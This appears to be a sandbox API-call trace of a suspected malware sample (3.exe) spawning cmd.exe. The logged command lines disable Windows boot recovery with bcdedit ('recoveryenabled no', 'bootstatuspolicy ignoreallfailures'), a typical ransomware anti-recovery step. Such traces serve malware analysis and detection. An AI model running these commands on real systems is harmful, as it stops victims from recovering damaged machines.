	[0033.681] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0xe8) returned 0x3d9e30
	[0033.681] GetProcessHeap () returned 0x3c0000
	[0033.681] RtlReAllocateHeap (Heap=0x3c0000, Flags=0x0, Ptr=0x3d9e30, Size=0x7e) returned 0x3d9e30
	[0033.681] GetProcessHeap () returned 0x3c0000
	[0033.681] RtlSizeHeap (HeapHandle=0x3c0000, Flags=0x0, MemoryPointer=0x3d9e30) returned 0x7e
	[0033.682] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0033.682] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bcdedit.*", fInfoLevelId=0x1, lpFindFileData=0x24eb60, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24eb60) returned 0xffffffffffffffff
	[0033.682] GetLastError () returned 0x2
	[0033.682] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bcdedit", fInfoLevelId=0x1, lpFindFileData=0x24eb60, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24eb60) returned 0xffffffffffffffff
	[0033.683] GetLastError () returned 0x2
	[0033.683] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0033.683] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\bcdedit.*", fInfoLevelId=0x1, lpFindFileData=0x24eb60, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24eb60) returned 0x3d9ec0
	[0034.108] GetProcessHeap () returned 0x3c0000
	[0034.108] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x28) returned 0x3d4660
	[0034.108] FindClose (in: hFindFile=0x3d9ec0 | out: hFindFile=0x3d9ec0) returned 1
	[0034.108] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\bcdedit.COM", fInfoLevelId=0x1, lpFindFileData=0x24eb60, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24eb60) returned 0xffffffffffffffff
	[0034.108] GetLastError () returned 0x2
	[0034.108] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\bcdedit.EXE", fInfoLevelId=0x1, lpFindFileData=0x24eb60, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24eb60) returned 0x3d9ec0
	[0034.109] GetProcessHeap () returned 0x3c0000
	[0034.109] RtlReAllocateHeap (Heap=0x3c0000, Flags=0x0, Ptr=0x3d4660, Size=0x8) returned 0x3d89a0
	[0034.109] FindClose (in: hFindFile=0x3d9ec0 | out: hFindFile=0x3d9ec0) returned 1
	[0034.109] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3
	[0034.109] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2
	[0034.109] GetConsoleTitleW (in: lpConsoleTitle=0x24f0b0, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\3.exe") returned 0x2b
	[0034.109] InitializeProcThreadAttributeList (in: lpAttributeList=0x24ee68, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x24ee28 | out: lpAttributeList=0x24ee68, lpSize=0x24ee28) returned 1
	[0034.109] UpdateProcThreadAttribute (in: lpAttributeList=0x24ee68, dwFlags=0x0, Attribute=0x60001, lpValue=0x24ee18, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x24ee68, lpPreviousValue=0x0) returned 1
	[0034.110] GetStartupInfoW (in: lpStartupInfo=0x24ef80 | out: lpStartupInfo=0x24ef80*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1, hStdOutput=0x0, hStdError=0x0)) 
	[0034.110] GetProcessHeap () returned 0x3c0000
	[0034.110] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0x20) returned 0x3d4660
	[0034.110] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38
	[0034.110] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2
	[0034.110] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2
	[0034.110] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3
	[0034.110] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3
	[0034.110] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3
	[0034.110] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3
	[0034.110] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3
	[0034.110] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3
	[0034.110] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5
	[0034.110] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5
	[0034.110] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9
	[0034.110] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9
	[0034.110] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11
	[0034.110] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12
	[0034.110] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13
	[0034.110] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13
	[0034.110] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0034.110] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0034.110] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0034.110] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0034.110] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
	[0034.110] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
	[0034.110] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
	[0034.110] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
	[0034.110] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13
	[0034.110] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13
	[0034.110] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13
	[0034.110] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16
	[0034.110] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16
	[0034.110] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17
	[0034.111] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17
	[0034.111] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18
	[0034.111] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18
	[0034.111] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18
	[0034.111] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20
	[0034.111] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20
	[0034.111] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20
	[0034.111] GetProcessHeap () returned 0x3c0000
	[0034.111] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x3d4660 | out: hHeap=0x3c0000) returned 1
	[0034.111] GetProcessHeap () returned 0x3c0000
	[0034.111] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0x12) returned 0x3d9ec0
	[0034.111] lstrcmpW (lpString1="\\bcdedit.exe", lpString2="\\XCOPY.EXE") returned -1
	[0034.112] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\bcdedit.exe", lpCommandLine="bcdedit  /set {default} bootstatuspolicy ignoreallfailures", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x24eea0*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="bcdedit  /set {default} bootstatuspolicy ignoreallfailures", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x24ee50 | out: lpCommandLine="bcdedit  /set {default} bootstatuspolicy ignoreallfailures", lpProcessInformation=0x24ee50*(hProcess=0x54, hThread=0x50, dwProcessId=0x9d8, dwThreadId=0x9dc)) returned 1
	[0034.116] CloseHandle (hObject=0x50) returned 1
	[0034.116] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1
	[0034.116] GetProcessHeap () returned 0x3c0000
	[0034.116] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x3dc2d0 | out: hHeap=0x3c0000) returned 1
	[0034.116] GetEnvironmentStringsW () returned 0x3dacd0*
	[0034.116] GetProcessHeap () returned 0x3c0000
	[0034.116] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0xae8) returned 0x3db7c0
	[0034.116] FreeEnvironmentStringsW (penv=0x3dacd0) returned 1
	[0034.116] WaitForSingleObject (hHandle=0x54, dwMilliseconds=0xffffffff) returned 0x0
	[0035.264] GetExitCodeProcess (in: hProcess=0x54, lpExitCode=0x24ed98 | out: lpExitCode=0x24ed98*=0x0) returned 1
	[0035.264] CloseHandle (hObject=0x54) returned 1
	[0035.264] _vsnwprintf (in: _Buffer=0x24f008, _BufferCount=0x13, _Format="%08X", _ArgList=0x24eda8 | out: _Buffer="00000000") returned 8
	[0035.264] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1
	[0035.264] GetProcessHeap () returned 0x3c0000
	[0035.264] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x3db7c0 | out: hHeap=0x3c0000) returned 1
	[0035.265] GetEnvironmentStringsW () returned 0x3dacd0*
	[0035.265] GetProcessHeap () returned 0x3c0000
	[0035.265] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0xb0e) returned 0x3dcdd0
	[0035.265] FreeEnvironmentStringsW (penv=0x3dacd0) returned 1
	[0035.265] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1
	[0035.265] GetProcessHeap () returned 0x3c0000
	[0035.265] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x3dcdd0 | out: hHeap=0x3c0000) returned 1
	[0035.265] GetEnvironmentStringsW () returned 0x3dacd0*
	[0035.265] GetProcessHeap () returned 0x3c0000
	[0035.265] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0xb0e) returned 0x3dcdd0
	[0035.265] FreeEnvironmentStringsW (penv=0x3dacd0) returned 1
	[0035.265] GetProcessHeap () returned 0x3c0000
	[0035.265] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x3d9ec0 | out: hHeap=0x3c0000) returned 1
	[0035.265] DeleteProcThreadAttributeList (in: lpAttributeList=0x24ee68 | out: lpAttributeList=0x24ee68) 
	[0035.265] _get_osfhandle (_FileHandle=1) returned 0x7
	[0035.265] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1
	[0035.266] _get_osfhandle (_FileHandle=1) returned 0x7
	[0035.266] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a3de194 | out: lpMode=0x4a3de194) returned 1
	[0035.266] _get_osfhandle (_FileHandle=0) returned 0x3
	[0035.266] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a3de198 | out: lpMode=0x4a3de198) returned 1
	[0035.266] SetConsoleInputExeNameW () returned 0x1
	[0035.266] GetConsoleOutputCP () returned 0x1b5
	[0035.267] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a3ebfe0 | out: lpCPInfo=0x4a3ebfe0) returned 1
	[0035.267] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409
	[0035.267] exit (_Code=0) 

Process:
	id = "4"
	image_name = "cmd.exe"
	filename = "c:\\windows\\system32\\cmd.exe"
	page_root = "0x51321000"
	os_pid = "0x9a0"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0x958"
	cmd_line = "/C bcdedit /set {default} recoveryenabled no"
	cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 24
	os_tid = 0x9a4

	[0033.278] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1cfb20 | out: lpSystemTimeAsFileTime=0x1cfb20*(dwLowDateTime=0xc1a832d0, dwHighDateTime=0x1d5956c)) 
	[0033.279] GetCurrentProcessId () returned 0x9a0
	[0033.279] GetCurrentThreadId () returned 0x9a4
	[0033.279] GetTickCount () returned 0x1142a0d
	[0033.279] QueryPerformanceCounter (in: lpPerformanceCount=0x1cfb28 | out: lpPerformanceCount=0x1cfb28*=15338350307) returned 1
	[0033.280] GetModuleHandleW (lpModuleName=0x0) returned 0x4a3b0000
	[0033.280] __set_app_type (_Type=0x1) 
	[0033.280] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a3d7810) returned 0x0
	[0033.280] __getmainargs (in: _Argc=0x4a3fa608, _Argv=0x4a3fa618, _Env=0x4a3fa610, _DoWildCard=0, _StartInfo=0x4a3de0f4 | out: _Argc=0x4a3fa608, _Argv=0x4a3fa618, _Env=0x4a3fa610) returned 0
	[0033.280] GetCurrentThreadId () returned 0x9a4
	[0033.280] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x9a4) returned 0x3c
	[0033.281] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76e30000
	[0033.281] GetProcAddress (hModule=0x76e30000, lpProcName="SetThreadUILanguage") returned 0x76e46d40
	[0033.281] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409
	[0033.281] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1
	[0033.281] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cfab8 | out: phkResult=0x1cfab8*=0x0) returned 0x2
	[0033.281] VirtualQuery (in: lpAddress=0x1cfaa0, lpBuffer=0x1cfa20, dwLength=0x30 | out: lpBuffer=0x1cfa20*(BaseAddress=0x1cf000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0033.281] VirtualQuery (in: lpAddress=0xd0000, lpBuffer=0x1cfa20, dwLength=0x30 | out: lpBuffer=0x1cfa20*(BaseAddress=0xd0000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0033.281] VirtualQuery (in: lpAddress=0xd1000, lpBuffer=0x1cfa20, dwLength=0x30 | out: lpBuffer=0x1cfa20*(BaseAddress=0xd1000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x3000, State=0x1000, Protect=0x104, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0033.281] VirtualQuery (in: lpAddress=0xd4000, lpBuffer=0x1cfa20, dwLength=0x30 | out: lpBuffer=0x1cfa20*(BaseAddress=0xd4000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0xfc000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0033.281] VirtualQuery (in: lpAddress=0x1d0000, lpBuffer=0x1cfa20, dwLength=0x30 | out: lpBuffer=0x1cfa20*(BaseAddress=0x1d0000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0xe000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0033.282] GetConsoleOutputCP () returned 0x1b5
	[0033.282] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a3ebfe0 | out: lpCPInfo=0x4a3ebfe0) returned 1
	[0033.282] SetConsoleCtrlHandler (HandlerRoutine=0x4a3d3184, Add=1) returned 1
	[0033.282] _get_osfhandle (_FileHandle=1) returned 0x7
	[0033.282] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1
	[0033.282] _get_osfhandle (_FileHandle=1) returned 0x7
	[0033.282] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a3de194 | out: lpMode=0x4a3de194) returned 1
	[0033.283] _get_osfhandle (_FileHandle=1) returned 0x7
	[0033.283] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1
	[0033.283] _get_osfhandle (_FileHandle=0) returned 0x3
	[0033.283] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a3de198 | out: lpMode=0x4a3de198) returned 1
	[0033.283] _get_osfhandle (_FileHandle=0) returned 0x3
	[0033.283] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1
	[0033.283] GetEnvironmentStringsW () returned 0x308ab0*
	[0033.283] GetProcessHeap () returned 0x2f0000
	[0033.283] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0xa7c) returned 0x309540
	[0033.283] FreeEnvironmentStringsW (penv=0x308ab0) returned 1
	[0033.284] GetProcessHeap () returned 0x2f0000
	[0033.284] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x8) returned 0x308350
	[0033.284] GetEnvironmentStringsW () returned 0x308ab0*
	[0033.284] GetProcessHeap () returned 0x2f0000
	[0033.284] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0xa7c) returned 0x309fd0
	[0033.284] FreeEnvironmentStringsW (penv=0x308ab0) returned 1
	[0033.284] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1ce978 | out: phkResult=0x1ce978*=0x44) returned 0x0
	[0033.284] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1ce970, lpData=0x1ce990, lpcbData=0x1ce974*=0x1000 | out: lpType=0x1ce970*=0x0, lpData=0x1ce990*=0x18, lpcbData=0x1ce974*=0x1000) returned 0x2
	[0033.284] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1ce970, lpData=0x1ce990, lpcbData=0x1ce974*=0x1000 | out: lpType=0x1ce970*=0x4, lpData=0x1ce990*=0x1, lpcbData=0x1ce974*=0x4) returned 0x0
	[0033.284] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1ce970, lpData=0x1ce990, lpcbData=0x1ce974*=0x1000 | out: lpType=0x1ce970*=0x0, lpData=0x1ce990*=0x1, lpcbData=0x1ce974*=0x1000) returned 0x2
	[0033.284] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1ce970, lpData=0x1ce990, lpcbData=0x1ce974*=0x1000 | out: lpType=0x1ce970*=0x4, lpData=0x1ce990*=0x0, lpcbData=0x1ce974*=0x4) returned 0x0
	[0033.284] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1ce970, lpData=0x1ce990, lpcbData=0x1ce974*=0x1000 | out: lpType=0x1ce970*=0x4, lpData=0x1ce990*=0x40, lpcbData=0x1ce974*=0x4) returned 0x0
	[0033.284] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1ce970, lpData=0x1ce990, lpcbData=0x1ce974*=0x1000 | out: lpType=0x1ce970*=0x4, lpData=0x1ce990*=0x40, lpcbData=0x1ce974*=0x4) returned 0x0
	[0033.284] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1ce970, lpData=0x1ce990, lpcbData=0x1ce974*=0x1000 | out: lpType=0x1ce970*=0x0, lpData=0x1ce990*=0x40, lpcbData=0x1ce974*=0x1000) returned 0x2
	[0033.284] RegCloseKey (hKey=0x44) returned 0x0
	[0033.284] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1ce978 | out: phkResult=0x1ce978*=0x44) returned 0x0
	[0033.284] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1ce970, lpData=0x1ce990, lpcbData=0x1ce974*=0x1000 | out: lpType=0x1ce970*=0x0, lpData=0x1ce990*=0x40, lpcbData=0x1ce974*=0x1000) returned 0x2
	[0033.285] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1ce970, lpData=0x1ce990, lpcbData=0x1ce974*=0x1000 | out: lpType=0x1ce970*=0x4, lpData=0x1ce990*=0x1, lpcbData=0x1ce974*=0x4) returned 0x0
	[0033.285] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1ce970, lpData=0x1ce990, lpcbData=0x1ce974*=0x1000 | out: lpType=0x1ce970*=0x0, lpData=0x1ce990*=0x1, lpcbData=0x1ce974*=0x1000) returned 0x2
	[0033.285] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1ce970, lpData=0x1ce990, lpcbData=0x1ce974*=0x1000 | out: lpType=0x1ce970*=0x4, lpData=0x1ce990*=0x0, lpcbData=0x1ce974*=0x4) returned 0x0
	[0033.285] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1ce970, lpData=0x1ce990, lpcbData=0x1ce974*=0x1000 | out: lpType=0x1ce970*=0x4, lpData=0x1ce990*=0x9, lpcbData=0x1ce974*=0x4) returned 0x0
	[0033.285] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1ce970, lpData=0x1ce990, lpcbData=0x1ce974*=0x1000 | out: lpType=0x1ce970*=0x4, lpData=0x1ce990*=0x9, lpcbData=0x1ce974*=0x4) returned 0x0
	[0033.285] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1ce970, lpData=0x1ce990, lpcbData=0x1ce974*=0x1000 | out: lpType=0x1ce970*=0x0, lpData=0x1ce990*=0x9, lpcbData=0x1ce974*=0x1000) returned 0x2
	[0033.285] RegCloseKey (hKey=0x44) returned 0x0
	[0033.285] time (in: timer=0x0 | out: timer=0x0) returned 0x5dc417d1
	[0033.285] srand (_Seed=0x5dc417d1) 
	[0033.285] GetCommandLineW () returned="/C bcdedit /set {default} recoveryenabled no"
	[0033.285] GetCommandLineW () returned="/C bcdedit /set {default} recoveryenabled no"
	[0033.285] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a3ec0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25
	[0033.285] GetProcessHeap () returned 0x2f0000
	[0033.285] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x218) returned 0x30aa60
	[0033.285] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x30aa70, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b
	[0033.285] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a3df360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63
	[0033.285] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a3df360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0033.285] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a3df360, nSize=0x2000 | out: lpBuffer="") returned 0x0
	[0033.286] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13
	[0033.286] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11
	[0033.286] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13
	[0033.286] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13
	[0033.286] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12
	[0033.286] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4
	[0033.286] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2
	[0033.286] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8
	[0033.286] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1
	[0033.286] GetProcessHeap () returned 0x2f0000
	[0033.286] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x309540 | out: hHeap=0x2f0000) returned 1
	[0033.286] GetEnvironmentStringsW () returned 0x308ab0*
	[0033.286] GetProcessHeap () returned 0x2f0000
	[0033.286] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0xa94) returned 0x30ac80
	[0033.286] FreeEnvironmentStringsW (penv=0x308ab0) returned 1
	[0033.286] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a3df360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b
	[0033.286] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a3df360, nSize=0x2000 | out: lpBuffer="") returned 0x0
	[0033.286] _wcsicmp (_String1="KEYS", _String2="CD") returned 8
	[0033.286] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6
	[0033.286] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8
	[0033.286] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8
	[0033.286] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7
	[0033.286] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9
	[0033.286] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7
	[0033.286] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3
	[0033.286] GetProcessHeap () returned 0x2f0000
	[0033.286] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x5c) returned 0x30b720
	[0033.286] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1cf780 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25
	[0033.286] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x1cf780, lpFilePart=0x1cf760 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x1cf760*="Desktop") returned 0x25
	[0033.287] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11
